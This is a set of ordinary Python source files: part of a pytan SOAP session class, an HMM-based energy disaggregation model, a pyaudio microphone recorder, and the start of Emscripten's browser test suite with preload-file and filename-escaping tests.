obj : :class:`taniumpy.object_types.base.BaseType`
* object to convert into XML
kwargs : dict, optional
* any number of attributes that can be set via :class:`taniumpy.object_types.options.Options` that control the servers response.
Returns
-------
obj_body : str
* The XML request body created from :func:`pytan.sessions.Session._build_body`
"""
clean_keys = ['command', 'object_list']
clean_kwargs = pytan.utils.clean_kwargs(kwargs=kwargs, keys=clean_keys)
if isinstance(obj, taniumpy.BaseType):
object_list = obj.toSOAPBody(minimal=True)
else:
object_list = '<{}/>'.format(obj._soap_tag)
cmd = 'GetObject'
obj_body = self._build_body(command=cmd, object_list=object_list, **clean_kwargs)
return obj_body
def _create_update_object_body(self, obj, **kwargs):
"""Utility method for building an XML Request Body to update an object.
Parameters
----------
obj : :class:`taniumpy.object_types.base.BaseType`
* object to convert into XML
kwargs : dict, optional
* any number of attributes that can be set via :class:`taniumpy.object_types.options.Options` that control the servers response.
Returns
-------
obj_body : str
* The XML request body created from :func:`pytan.sessions.Session._build_body`
"""
clean_keys = ['command', 'object_list']
clean_kwargs = pytan.utils.clean_kwargs(kwargs=kwargs, keys=clean_keys)
object_list = obj.toSOAPBody(minimal=True)
cmd = 'UpdateObject'
obj_body = self._build_body(command=cmd, object_list=object_list, **clean_kwargs)
return obj_body
def _check_auth(self):
"""Utility method to check if authentication has been done yet, and throw an exception if not."""
if not self.is_auth:
class_name = self.__class__.__name__
err = "Not yet authenticated, use {}.authenticate()!".format
raise pytan.exceptions.AuthorizationError(err(class_name))
def _regex_body_for_element(self, body, element, fail=True):
"""Utility method to use a regex to get an element from an XML body.
Parameters
----------
body : str
* XML to search
element : str
* element name to search for in body
fail : bool, optional
* default: True
* True: throw exception if unable to find any matches for `regex` in `body`
* False do not throw exception if unable to find any matches for `regex` in `body`
Returns
-------
ret : str
* The first value that matches the regex ELEMENT_RE_TXT with element
Notes
-----
* Using regex is WAY faster than ElementTree chewing the body in and out, this matters a LOT on LARGE return bodies
"""
regex_txt = self.ELEMENT_RE_TXT.format(element)
regex = re.compile(regex_txt, re.IGNORECASE | re.DOTALL)
ret = regex.search(body)
if not ret and fail:
m = "Unable to find {} in body: {}".format
raise Exception(m(regex.pattern, body))
else:
ret = str(ret.groups()[0].strip())
m = "Value of element '{}': '{}' (using pattern: '{}'".format
self.mylog.debug(m(element, ret, regex.pattern))
return ret
def _extract_resultxml(self, response_body):
"""Utility method to get the 'ResultXML' element from an XML body.
Parameters
----------
response_body : str
* XML body to search for the 'ResultXML' element in
Returns
-------
ret : str of ResultXML element
* str if 'export_id' element found in XML
"""
el = ET.fromstring(response_body)
# find the ResultXML node
resultxml_el = el.find('.//ResultXML')
if resultxml_el is None:
m = "Unable to find ResultXML element in XML response: {}".format
raise pytan.exceptions.AuthorizationError(m(response_body))
resultxml_text = resultxml_el.text
if not resultxml_text:
m = "Empty ResultXML element in XML response: {}".format
raise pytan.exceptions.AuthorizationError(m(response_body))
return resultxml_text
def _get_response(self, request_body, **kwargs):
"""A wrapper around :func:`pytan.sessions.Session.http_post` for SOAP XML requests and responses.
This method will update self.session_id if the response contains a different session_id than what is currently in this object.
Parameters
----------
request_body : str
* the XML request body to send to the server
connect_timeout: int, optional
* default: self.SOAP_CONNECT_TIMEOUT_SEC
* timeout in seconds for connection to host
response_timeout: int, optional
* default: self.SOAP_RESPONSE_TIMEOUT_SEC
* timeout in seconds for response from host
retry_auth: bool, optional
* default: True
* True: retry authentication with username/password if session_id fails
* False: throw exception if session_id fails
retry_count: int, optional
* number of times to retry the request if the server fails to respond properly or in time
pytan_help : str, optional
* default: ''
* help string to add to self.LAST_REQUESTS_RESPONSE.pytan_help
Returns
-------
body : str
* str containing body of response from server
See Also
--------
:func:`pytan.sessions.Session.http_post` : wrapper method used to perform the HTTP POST
"""
retry_auth = kwargs.get('retry_auth', True)
self._check_auth()
self.LAST_RESPONSE_INFO = {}
request_command = self._regex_body_for_element(
body=request_body, element='command', fail=True,
)
self.LAST_RESPONSE_INFO['request_command'] = request_command
req_args = {}
req_args['body'] = request_body
req_args['headers'] = dict(self.SOAP_REQUEST_HEADERS)
req_args['connect_timeout'] = kwargs.get('connect_timeout', self.SOAP_CONNECT_TIMEOUT_SEC)
req_args['response_timeout'] = kwargs.get(
'response_timeout', self.SOAP_RESPONSE_TIMEOUT_SEC
)
req_args['pytan_help'] = kwargs.get('pytan_help', '')
if 'retry_count' in kwargs:
req_args['retry_count'] = kwargs['retry_count']
self.LAST_RESPONSE_INFO['request_args'] = req_args
sent = datetime.utcnow()
self.LAST_RESPONSE_INFO['sent'] = sent
response_body = self.http_post(**req_args)
received = datetime.utcnow()
self.LAST_RESPONSE_INFO['received'] = received
elapsed = received - sent
self.LAST_RESPONSE_INFO['elapsed'] = elapsed
# m = "HTTP Response: Timing info -- SENT: {}, RECEIVED: {}, ELAPSED: {}".format
# self.mylog.debug(m(sent, received, elapsed))
response_command = self._regex_body_for_element(
body=response_body, element='command', fail=True,
)
self.LAST_RESPONSE_INFO['response_command'] = response_command
if 'forbidden' in response_command.lower():
if retry_auth:
m = "Last request was denied, re-authenticating with user/pass".format
self.authlog.debug(m())
# we may have hit the 5 minute expiration for session_id, empty out session ID,
# re-authenticate, then retry request
self._session_id = ''
self.authenticate(**kwargs)
# re-issue the request
kwargs['retry_auth'] = False
response_body = self._get_response(request_body=request_body, **kwargs)
else:
m = "Access denied after re-authenticating! Server response: {}".format
raise pytan.exceptions.AuthorizationError(m(response_command))
elif response_command != request_command:
for p in self.BAD_RESPONSE_CMD_PRUNES:
response_command = response_command.replace(p, '').strip()
m = "Response command {} does not match request command {}".format
raise pytan.exceptions.BadResponseError(m(response_command, request_command))
# update session_id, in case new one issued
self.session_id = self._regex_body_for_element(
body=response_body, element='session', fail=True,
)
# check to see if server_version set in response (6.5+ only)
if self._invalid_server_version():
server_version = self._regex_body_for_element(
body=response_body, element='server_version', fail=False,
)
if server_version and self.server_version != server_version:
self.server_version = server_version
return response_body
def _invalid_server_version(self):
"""Utility method to find out if self.server_version is valid or not."""
current_server_version = getattr(self, 'server_version', '')
if current_server_version in self.BAD_SERVER_VERSIONS:
return True
return False
|
afhmm_sac.py
|
from __future__ import print_function, division
from warnings import warn
import pandas as pd
import numpy as np
from nilmtk.disaggregate import Disaggregator
from hmmlearn import hmm
from collections import OrderedDict
import cvxpy as cvx
from collections import Counter
import matplotlib.pyplot as plt
import time
from sklearn.metrics import mean_squared_error,mean_absolute_error
import math
from multiprocessing import Process, Manager
class AFHMM_SAC(Disaggregator):
"""1 dimensional baseline Mean algorithm.
"""
def __init__(self, params):
self.model = []
self.MIN_CHUNK_LENGTH = 100
self.MODEL_NAME = 'AFHMM_SAC'
self.default_num_states = 2
self.models = []
self.num_appliances = 0
self.appliances = []
self.time_period = 720
self.signal_aggregates = OrderedDict()
self.time_period = params.get('time_period', self.time_period)
self.default_num_states = params.get('default_num_states',2)
self.save_model_path = params.get('save-model-path', None)
self.load_model_path = params.get('pretrained-model-path',None)
self.chunk_wise_training = False
if self.load_model_path:
self.load_model(self.load_model_path)
def partial_fit(self, train_main, train_appliances, **load_kwargs):
self.models = []
self.num_appliances = 0
self.appliances = []
'''
train_main :- pd.DataFrame It will contain the mains reading.
train_appliances :- list of tuples [('appliance1',df1),('appliance2',df2),...]
'''
train_main = pd.concat(train_main, axis=0)
train_app_tmp = []
for app_name, df_list in train_appliances:
df_list = pd.concat(df_list, axis=0)
train_app_tmp.append((app_name,df_list))
train_appliances = train_app_tmp
learnt_model = OrderedDict()
means_vector = []
one_hot_states_vector = []
pi_s_vector = []
transmat_vector = []
states_vector = []
train_main = train_main.values.flatten().reshape((-1,1))
for appliance_name, power in train_appliances:
#print (appliance_name)
self.appliances.append(appliance_name)
X = power.values.reshape((-1,1))
learnt_model[appliance_name] = hmm.GaussianHMM(self.default_num_states, "full")
# Fit
learnt_model[appliance_name].fit(X)
means = learnt_model[appliance_name].means_.flatten().reshape((-1,1))
states = learnt_model[appliance_name].predict(X)
transmat = learnt_model[appliance_name].transmat_
counter = Counter(states.flatten())
total = 0
keys = list(counter.keys())
keys.sort()
for i in keys:
total+=counter[i]
pi = []
for i in keys:
pi.append(counter[i]/total)
pi = np.array(pi)
nb_classes = self.default_num_states
targets = states.reshape(-1)
means_vector.append(means)
pi_s_vector.append(pi)
transmat_vector.append(transmat.T)
states_vector.append(states)
self.num_appliances+=1
self.signal_aggregates[appliance_name] = (np.mean(X)*self.time_period).reshape((-1,))
self.means_vector = means_vector
self.pi_s_vector = pi_s_vector
self.means_vector = means_vector
self.transmat_vector = transmat_vector
# print(transmat_vector)
# print (means_vector)
# print (states_vector)
# print (pi_s_vector)
print ("Finished Training")
# print (self.signal_aggregates)
# print (np.log(transmat))
# print(pi)
# print (np.log(pi))
#print (np.sum(transmat_vector[0],axis=1))
#print (np.sum(transmat_vector[0],axis=0))
#print (states.shape)
#print (one_hot_targets.shape)
# one_hot_states_vector = np.array(one_hot_states_vector)
# # print (transmat_vector[0])
# # print (np.sum(transmat_vector[0],axis=0))
# # print (np.sum(transmat_vector[0],axis=1))
# appliance_variable_matrix = []
# #print (len(states_vector))
# #variable_matrix = np.zeros((len(appliance_states),self.default_num_states,self.default_num_states))
# for appliance_states in states_vector:
# variable_matrix = np.zeros((len(appliance_states),self.default_num_states,self.default_num_states))
# for i in range(1,len(appliance_states)):
# current_state = appliance_states[i]
# previous_state = appliance_states[i-1]
# variable_matrix[i,current_state, previous_state] = 1
# appliance_variable_matrix.append(variable_matrix)
# appliance_variable_matrix = np.array(appliance_variable_matrix)
# term_1_list = []
# term_2_list = []
def disaggregate_thread(self, test_mains,index,d):
means_vector = self.means_vector
pi_s_vector = self.pi_s_vector
means_vector = self.means_vector
transmat_vector = self.transmat_vector
sigma = 100*np.ones((len(test_mains),1))
flag = 0
for epoch in range(6):
if epoch%2==1:
# The alernative Minimization
usage = np.zeros((len(test_mains)))
for appliance_id in range(self.num_appliances):
app_usage= np.sum(s_[appliance_id]@means_vector[appliance_id],axis=1)
usage+=app_usage
sigma = (test_mains.flatten() - usage.flatten()).reshape((-1,1))
sigma = np.where(sigma<1,1,sigma)
else:
if flag==0:
constraints = []
cvx_state_vectors = []
cvx_variable_matrices = []
delta = cvx.Variable(shape=(len(test_mains),1), name='delta_t')
for appliance_id in range(self.num_appliances):
state_vector = cvx.Variable(shape=(len(test_mains), self.default_num_states), name='state_vec-%s'%(appliance_id))
cvx_state_vectors.append(state_vector)
# Enforcing that their values are ranged
constraints+=[cvx_state_vectors[appliance_id]>=0]
constraints+=[cvx_state_vectors[appliance_id]<=1]
# Enforcing that sum of states equals 1
for t in range(len(test_mains)): # 6c
constraints+=[cvx.sum(cvx_state_vectors[appliance_id][t])==1]
# Creating Variable matrices for every appliance
appliance_variable_matrix = []
for t in range(len(test_mains)):
matrix = cvx.Variable(shape=(self.default_num_states, self.default_num_states), name='variable_matrix-%s-%d'%(appliance_id,t))
appliance_variable_matrix.append(matrix)
cvx_variable_matrices.append(appliance_variable_matrix)
# Enforcing that their values are ranged
for t in range(len(test_mains)):
constraints+=[cvx_variable_matrices[appliance_id][t]>=0]
constraints+=[cvx_variable_matrices[appliance_id][t]<=1]
# Constraint 6e
for t in range(0,len(test_mains)): # 6e
for i in range(self.default_num_states):
constraints+=[cvx.sum(((cvx_variable_matrices[appliance_id][t]).T)[i]) == cvx_state_vectors[appliance_id][t][i]]
# Constraint 6d
for t in range(1,len(test_mains)): # 6d
for i in range(self.default_num_states):
constraints+=[cvx.sum(cvx_variable_matrices[appliance_id][t][i]) == cvx_state_vectors[appliance_id][t-1][i]]
for appliance_id in range(self.num_appliances):
appliance_usage = cvx_state_vectors[appliance_id]@means_vector[appliance_id]
total_appliance_usage = cvx.sum(appliance_usage)
constraints+=[total_appliance_usage <= self.signal_aggregates[self.appliances[appliance_id]]]
# Second order cone constraints
total_observed_reading = np.zeros((test_mains.shape))
#print (len(cvx_state_vectors))
for appliance_id in range(self.num_appliances):
total_observed_reading+=cvx_state_vectors[appliance_id]@means_vector[appliance_id]
flag=1
term_1 = 0
term_2 = 0
for appliance_id in range(self.num_appliances):
# First loop is over appliances
variable_matrix = cvx_variable_matrices[appliance_id]
transmat = transmat_vector[appliance_id]
# Next loop is over different time-stamps
for matrix in variable_matrix:
term_1-=cvx.sum(cvx.multiply(matrix,np.log(transmat)))
one_hot_states = cvx_state_vectors[appliance_id]
pi = pi_s_vector[appliance_id]
# The expression involving start states
first_one_hot_states = one_hot_states[0]
term_2-= cvx.sum(cvx.multiply(first_one_hot_states,np.log(pi)))
flag = 1
expression = 0
term_3 = 0
term_4 = 0
for t in range(len(test_mains)):
term_4+= .5 * ((test_mains[t][0] - total_observed_reading[t][0])**2 / (sigma[t]**2))
term_3+= .5 * (np.log(sigma[t]**2))
expression = term_1 + term_2 + term_3 + term_4
expression = cvx.Minimize(expression)
u = time.time()
prob = cvx.Problem(expression, constraints)
prob.solve(solver=cvx.SCS,verbose=False, warm_start=True)
s_ = [i.value for i in cvx_state_vectors]
prediction_dict = {}
for appliance_id in range(self.num_appliances):
app_name = self.appliances[appliance_id]
app_usage= np.sum(s_[appliance_id]@means_vector[appliance_id],axis=1)
prediction_dict[app_name] = app_usage.flatten()
d[index] = pd.DataFrame(prediction_dict,dtype='float32')
def disaggregate_chunk(self, test_mains_list):
# Sistributes the test mains across multiple threads and runs them in parallel
manager = Manager()
d = manager.dict()
predictions_lst = []
for test_mains in test_mains_list:
test_mains_big = test_mains.values.flatten().reshape((-1,1))
self.arr_of_results = []
st = time.time()
threads = []
for test_block in range(int(math.ceil(len(test_mains_big)/self.time_period))):
test_mains = test_mains_big[test_block*(self.time_period):(test_block+1)*self.time_period]
t = Process(target=self.disaggregate_thread, args=(test_mains,test_block,d))
threads.append(t)
for t in threads:
t.start()
for t in threads:
t.join()
for i in range(len(threads)):
self.arr_of_results.append(d[i])
prediction = pd.concat(self.arr_of_results,axis=0)
predictions_lst.append(prediction)
return predictions_lst
|
recorder.py
|
import matplotlib
matplotlib.use('TkAgg') # THIS MAKES IT FAST!
import numpy
import scipy
import struct
import pyaudio
import threading
import pylab
import struct
class SwhRecorder:
"""Simple, cross-platform class to record from the microphone."""
def __init__(self):
"""minimal garb is executed when class is loaded."""
self.RATE=48100
self.BUFFERSIZE=2**12 #1024 is a good buffer size
self.secToRecord=.1
self.threadsDieNow=False
self.newAudio=False
def setup(self):
"""initialize sound card."""
#TODO - windows detection vs. alsa or something for linux
#TODO - try/except for sound card selection/initiation
self.buffersToRecord=int(self.RATE*self.secToRecord/self.BUFFERSIZE)
if self.buffersToRecord==0: self.buffersToRecord=1
self.samplesToRecord=int(self.BUFFERSIZE*self.buffersToRecord)
self.chunksToRecord=int(self.samplesToRecord/self.BUFFERSIZE)
self.secPerPoint=1.0/self.RATE
self.p = pyaudio.PyAudio()
self.inStream = self.p.open(format=pyaudio.paInt16,channels=1,
rate=self.RATE,input=True,frames_per_buffer=self.BUFFERSIZE)
self.xsBuffer=numpy.arange(self.BUFFERSIZE)*self.secPerPoint
self.xs=numpy.arange(self.chunksToRecord*self.BUFFERSIZE)*self.secPerPoint
self.audio=numpy.empty((self.chunksToRecord*self.BUFFERSIZE),dtype=numpy.int16)
def close(self):
"""cleanly back out and release sound card."""
self.p.close(self.inStream)
### RECORDING AUDIO ###
def getAudio(self):
"""get a single buffer size worth of audio."""
audioString=self.inStream.read(self.BUFFERSIZE)
return numpy.fromstring(audioString,dtype=numpy.int16)
def record(self,forever=True):
"""record secToRecord seconds of audio."""
while True:
if self.threadsDieNow: break
for i in range(self.chunksToRecord):
self.audio[i*self.BUFFERSIZE:(i+1)*self.BUFFERSIZE]=self.getAudio()
self.newAudio=True
if forever==False: break
def continuousStart(self):
"""CALL THIS to start running forever."""
self.t = threading.Thread(target=self.record)
self.t.start()
def continuousEnd(self):
"""shut down continuous recording."""
self.threadsDieNow=True
### MATH ###
def downsample(self,data,mult):
"""Given 1D data, return the binned average."""
overhang=len(data)%mult
if overhang: data=data[:-overhang]
data=numpy.reshape(data,(len(data)/mult,mult))
data=numpy.average(data,1)
return data
def fft(self,data=None,trimBy=10,logScale=False,divBy=100):
if data==None:
data=self.audio.flatten()
left,right=numpy.split(numpy.abs(numpy.fft.fft(data)),2)
ys=numpy.add(left,right[::-1])
if logScale:
ys=numpy.multiply(20,numpy.log10(ys))
xs=numpy.arange(self.BUFFERSIZE/2,dtype=float)
if trimBy:
i=int((self.BUFFERSIZE/2)/trimBy)
ys=ys[:i]
xs=xs[:i]*self.RATE/self.BUFFERSIZE
if divBy:
ys=ys/float(divBy)
return xs,ys
### VISUALIZATION ###
def plotAudio(self):
"""open a matplotlib popup window showing audio data."""
pylab.plot(self.audio.flatten())
pylab.show()
|
test_browser.py
|
# coding=utf-8
# Copyright 2013 The Emscripten Authors. All rights reserved.
# Emscripten is available under two separate licenses, the MIT license and the
# University of Illinois/NCSA Open Source License. Both these licenses can be
# found in the LICENSE file.
import argparse
import json
import multiprocessing
import os
import random
import shlex
import shutil
import subprocess
import time
import unittest
import webbrowser
import zlib
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.request import urlopen
from runner import BrowserCore, RunnerCore, path_from_root, has_browser, EMTEST_BROWSER, Reporting
from runner import create_test_file, parameterized, ensure_dir, disabled
from tools import building
from tools import shared
from tools import system_libs
from tools.shared import PYTHON, EMCC, WINDOWS, FILE_PACKAGER, PIPE
from tools.shared import try_delete, config
def test_chunked_synchronous_xhr_server(support_byte_ranges, chunkSize, data, checksum, port):
class ChunkedServerHandler(BaseHTTPRequestHandler):
def sendheaders(s, extra=[], length=len(data)):
s.send_response(200)
s.send_header("Content-Length", str(length))
s.send_header("Access-Control-Allow-Origin", "http://localhost:%s" % port)
s.send_header('Cross-Origin-Resource-Policy', 'cross-origin')
s.send_header('Cache-Control', 'no-cache, no-store, must-revalidate')
s.send_header("Access-Control-Expose-Headers", "Content-Length, Accept-Ranges")
s.send_header("Content-type", "application/octet-stream")
if support_byte_ranges:
s.send_header("Accept-Ranges", "bytes")
for i in extra:
s.send_header(i[0], i[1])
s.end_headers()
def do_HEAD(s):
s.sendheaders()
def do_OPTIONS(s):
s.sendheaders([("Access-Control-Allow-Headers", "Range")], 0)
def do_GET(s):
if s.path == '/':
s.sendheaders()
elif not support_byte_ranges:
s.sendheaders()
s.wfile.write(data)
else:
start, end = s.headers.get("range").split("=")[1].split("-")
start = int(start)
end = int(end)
end = min(len(data) - 1, end)
length = end - start + 1
s.sendheaders([], length)
s.wfile.write(data[start:end + 1])
# CORS preflight makes OPTIONS requests which we need to account for.
expectedConns = 22
httpd = HTTPServer(('localhost', 11111), ChunkedServerHandler)
for i in range(expectedConns + 1):
httpd.handle_request()
def shell_with_script(shell_file, output_file, replacement):
with open(path_from_root('src', shell_file)) as input:
with open(output_file, 'w') as output:
output.write(input.read().replace('{{{ SCRIPT }}}', replacement))
def is_chrome():
return EMTEST_BROWSER and 'chrom' in EMTEST_BROWSER.lower()
def no_chrome(note='chrome is not supported'):
if is_chrome():
return unittest.skip(note)
return lambda f: f
def is_firefox():
return EMTEST_BROWSER and 'firefox' in EMTEST_BROWSER.lower()
def no_firefox(note='firefox is not supported'):
if is_firefox():
return unittest.skip(note)
return lambda f: f
def no_swiftshader(f):
assert callable(f)
def decorated(self):
if is_chrome() and '--use-gl=swiftshader' in EMTEST_BROWSER:
self.skipTest('not compatible with swiftshader')
return f(self)
return decorated
def requires_threads(f):
assert callable(f)
def decorated(self, *args, **kwargs):
if os.environ.get('EMTEST_LACKS_THREAD_SUPPORT'):
self.skipTest('EMTEST_LACKS_THREAD_SUPPORT is set')
return f(self, *args, **kwargs)
return decorated
def requires_asmfs(f):
assert callable(f)
def decorated(self, *args, **kwargs):
# https://github.com/emscripten-core/emscripten/issues/9534
self.skipTest('ASMFS is looking for a maintainer')
return f(self, *args, **kwargs)
return decorated
# Today we only support the wasm backend so any tests that is disabled under the llvm
# backend is always disabled.
# TODO(sbc): Investigate all tests with this decorator and either fix of remove the test.
def no_wasm_backend(note=''):
assert not callable(note)
return unittest.skip(note)
requires_graphics_hardware = unittest.skipIf(os.getenv('EMTEST_LACKS_GRAPHICS_HARDWARE'), "This test requires graphics hardware")
requires_sound_hardware = unittest.skipIf(os.getenv('EMTEST_LACKS_SOUND_HARDWARE'), "This test requires sound hardware")
requires_sync_compilation = unittest.skipIf(is_chrome(), "This test requires synchronous compilation, which does not work in Chrome (except for tiny wasms)")
requires_offscreen_canvas = unittest.skipIf(os.getenv('EMTEST_LACKS_OFFSCREEN_CANVAS'), "This test requires a browser with OffscreenCanvas")
class browser(BrowserCore):
@classmethod
def setUpClass(cls):
super(browser, cls).setUpClass()
cls.browser_timeout = 60
print()
print('Running the browser tests. Make sure the browser allows popups from localhost.')
print()
def setUp(self):
super(BrowserCore, self).setUp()
# avoid various compiler warnings that many browser tests currently generate
self.emcc_args += [
'-Wno-pointer-sign',
'-Wno-int-conversion',
]
def test_sdl1_in_emscripten_nonstrict_mode(self):
if 'EMCC_STRICT' in os.environ and int(os.environ['EMCC_STRICT']):
self.skipTest('This test requires being run in non-strict mode (EMCC_STRICT env. variable unset)')
# TODO: This test is verifying behavior that will be deprecated at some point in the future, remove this test once
# system JS libraries are no longer automatically linked to anymore.
self.btest('hello_world_sdl.cpp', reference='htmltest.png')
def test_sdl1(self):
self.btest('hello_world_sdl.cpp', reference='htmltest.png', args=['-lSDL', '-lGL'])
self.btest('hello_world_sdl.cpp', reference='htmltest.png', args=['-s', 'USE_SDL', '-lGL']) # is the default anyhow
# Deliberately named as test_zzz_* to make this test the last one
# as this test may take the focus away from the main test window
# by opening a new window and possibly not closing it.
def test_zzz_html_source_map(self):
if not has_browser():
self.skipTest('need a browser')
cpp_file = 'src.cpp'
html_file = 'src.html'
# browsers will try to 'guess' the corresponding original line if a
# generated line is unmapped, so if we want to make sure that our
# numbering is correct, we need to provide a couple of 'possible wrong
# answers'. thus, we add some printf calls so that the cpp file gets
# multiple mapped lines. in other words, if the program consists of a
# single 'throw' statement, browsers may just map any thrown exception to
# that line, because it will be the only mapped line.
with open(cpp_file, 'w') as f:
f.write(r'''
#include <cstdio>
int main() {
printf("Starting test\n");
try {
throw 42; // line 8
} catch (int e) { }
printf("done\n");
return 0;
}
''')
# use relative paths when calling emcc, because file:// URIs can only load
# sourceContent when the maps are relative paths
try_delete(html_file)
try_delete(html_file + '.map')
self.compile_btest(['src.cpp', '-o', 'src.html', '-g4'])
self.assertExists(html_file)
self.assertExists('src.wasm.map')
webbrowser.open_new('file://' + html_file)
print('''
If manually bisecting:
Check that you see src.cpp among the page sources.
Even better, add a breakpoint, e.g. on the printf, then reload, then step
through and see the print (best to run with EMTEST_SAVE_DIR=1 for the reload).
''')
def test_emscripten_log(self):
self.btest_exit(path_from_root('tests', 'emscripten_log', 'emscripten_log.cpp'), 0,
args=['--pre-js', path_from_root('src', 'emscripten-source-map.min.js'), '-g4'])
def test_preload_file(self):
absolute_src_path = os.path.join(self.get_dir(), 'somefile.txt').replace('\\', '/')
open(absolute_src_path, 'w').write('''load me right before running the code please''')
absolute_src_path2 = os.path.join(self.get_dir(), '.somefile.txt').replace('\\', '/')
open(absolute_src_path2, 'w').write('''load me right before running the code please''')
absolute_src_path3 = os.path.join(self.get_dir(), 'some@file.txt').replace('\\', '/')
open(absolute_src_path3, 'w').write('''load me right before running the code please''')
def make_main(path):
print('make main at', path)
path = path.replace('\\', '\\\\').replace('"', '\\"') # Escape tricky path name for use inside a C string.
create_test_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = !strcmp("load me right before", buf);
REPORT_RESULT(result);
return 0;
}
''' % path)
test_cases = [
# (source preload-file string, file on target FS to load)
("somefile.txt", "somefile.txt"),
(".somefile.txt@somefile.txt", "somefile.txt"),
("./somefile.txt", "somefile.txt"),
("somefile.txt@file.txt", "file.txt"),
("./somefile.txt@file.txt", "file.txt"),
("./somefile.txt@./file.txt", "file.txt"),
("somefile.txt@/file.txt", "file.txt"),
("somefile.txt@/", "somefile.txt"),
(absolute_src_path + "@file.txt", "file.txt"),
(absolute_src_path + "@/file.txt", "file.txt"),
(absolute_src_path + "@/", "somefile.txt"),
("somefile.txt@/directory/file.txt", "/directory/file.txt"),
("somefile.txt@/directory/file.txt", "directory/file.txt"),
(absolute_src_path + "@/directory/file.txt", "directory/file.txt"),
("some@@file.txt@other.txt", "other.txt"),
("some@@file.txt@some@@otherfile.txt", "some@otherfile.txt")]
for srcpath, dstpath in test_cases:
print('Testing', srcpath, dstpath)
make_main(dstpath)
self.compile_btest(['main.cpp', '--preload-file', srcpath, '-o', 'page.html'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
if WINDOWS:
# On Windows, the following non-alphanumeric non-control code ASCII characters are supported.
# The characters <, >, ", |, ?, * are not allowed, because the Windows filesystem doesn't support those.
tricky_filename = '!#$%&\'()+,-. ;=@[]^_`{}~.txt'
else:
# All 7-bit non-alphanumeric non-control code ASCII characters except /, : and \ are allowed.
tricky_filename = '!#$%&\'()+,-. ;=@[]^_`{}~ "*<>?|.txt'
open(os.path.join(self.get_dir(), tricky_filename), 'w').write('''load me right before running the code please''')
make_main(tricky_filename)
# As an Emscripten-specific feature, the character '@' must be escaped in the form '@@' to not confuse with the 'src@dst' notation.
self.compile_btest(['main.cpp', '--preload-file', tricky_filename.replace('@', '@@'), '-o', 'page.html'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# By absolute path
make_main('somefile.txt') # absolute becomes relative
self.compile_btest(['main.cpp', '--preload-file', absolute_src_path, '-o', 'page.html'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# Test subdirectory handling with asset packaging.
try_delete('assets')
ensure_dir('assets/sub/asset1/'.replace('\\', '/'))
ensure_dir('assets/sub/asset1/.git'.replace('\\', '/')) # Test adding directory that shouldn't exist.
ensure_dir('assets/sub/asset2/'.replace('\\', '/'))
create_test_file('assets/sub/asset1/file1.txt', '''load me right before running the code please''')
create_test_file('assets/sub/asset1/.git/shouldnt_be_embedded.txt', '''this file should not get embedded''')
create_test_file('assets/sub/asset2/file2.txt', '''load me right before running the code please''')
absolute_assets_src_path = 'assets'.replace('\\', '/')
def make_main_two_files(path1, path2, nonexistingpath):
create_test_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = !strcmp("load me right before", buf);
f = fopen("%s", "r");
if (f == NULL)
result = 0;
fclose(f);
f = fopen("%s", "r");
if (f != NULL)
result = 0;
REPORT_RESULT(result);
return 0;
}
''' % (path1, path2, nonexistingpath))
test_cases = [
# (source directory to embed, file1 on target FS to load, file2 on target FS to load, name of a file that *shouldn't* exist on VFS)
("assets", "assets/sub/asset1/file1.txt", "assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets/", "assets/sub/asset1/file1.txt", "assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets/@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets@./", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
(absolute_assets_src_path + "@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
(absolute_assets_src_path + "@/assets", "/assets/sub/asset1/file1.txt", "/assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt")]
for test in test_cases:
(srcpath, dstpath1, dstpath2, nonexistingpath) = test
make_main_two_files(dstpath1, dstpath2, nonexistingpath)
print(srcpath)
self.compile_btest(['main.cpp', '--preload-file', srcpath, '--exclude-file', '*/.*', '-o', 'page.html'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# Should still work with -o subdir/..
make_main('somefile.txt') # absolute becomes relative
ensure_dir('dirrey')
self.compile_btest(['main.cpp', '--preload-file', absolute_src_path, '-o', 'dirrey/page.html'])
self.run_browser('dirrey/page.html', 'You should see |load me right before|.', '/report_result?1')
# With FS.preloadFile
create_test_file('pre.js', '''
Module.preRun = function() {
FS.createPreloadedFile('/', 'someotherfile.txt', 'somefile.txt', true, false); // we need --use-preload-plugins for this.
};
''')
make_main('someotherfile.txt')
self.compile_btest(['main.cpp', '--pre-js', 'pre.js', '-o', 'page.html', '--use-preload-plugins'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# Tests that user .html shell files can manually download .data files created with --preload-file cmdline.
def test_preload_file_with_manual_data_download(self):
src = path_from_root('tests/manual_download_data.cpp')
create_test_file('file.txt', '''Hello!''')
self.compile_btest([src, '-o', 'manual_download_data.js', '--preload-file', 'file.txt@/file.txt'])
shutil.copyfile(path_from_root('tests', 'manual_download_data.html'), 'manual_download_data.html')
self.run_browser('manual_download_data.html', 'Hello!', '/report_result?1')
# Tests that if the output files have single or double quotes in them, that it will be handled by correctly escaping the names.
def test_output_file_escaping(self):
tricky_part = '\'' if WINDOWS else '\' and \"' # On Windows, files/directories may not contain a double quote character. On non-Windowses they can, so test that.
d = 'dir with ' + tricky_part
abs_d = os.path.join(self.get_dir(), d)
ensure_dir(abs_d)
